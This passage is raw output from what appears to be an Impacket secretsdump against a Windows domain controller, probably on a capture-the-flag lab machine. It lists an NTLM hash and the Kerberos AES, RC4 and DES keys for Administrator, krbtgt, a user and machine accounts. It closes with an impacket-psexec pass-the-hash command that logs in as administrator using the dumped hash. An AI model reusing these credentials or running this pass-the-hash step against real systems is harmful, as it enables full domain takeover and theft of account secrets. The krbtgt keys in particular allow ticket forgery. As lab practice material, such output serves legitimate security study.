darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41
krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3
krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7
john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea
john.w:0x13:7b145a89aed458eaea530a2bd1eb93bd
john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e
john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db
john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b
DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941
DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db
DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a
darkzero-ext$:aes256-cts-hmac-sha1-96:eec6ace095e0f3b33a9714c2a23b19924542ba13a3268ea6831410020e1c11f3
darkzero-ext$:aes128-cts-hmac-sha1-96:3efb8a66f0a09fbc6602e46f22e8fc1c
darkzero-ext$:0x17:95e4ba6219aced32642afa4661781d4b
[*] Cleaning up...
impacket-psexec administrator@10.129.124.137 -hashes :5917507bdf2ef2c2b0a869a1cba40726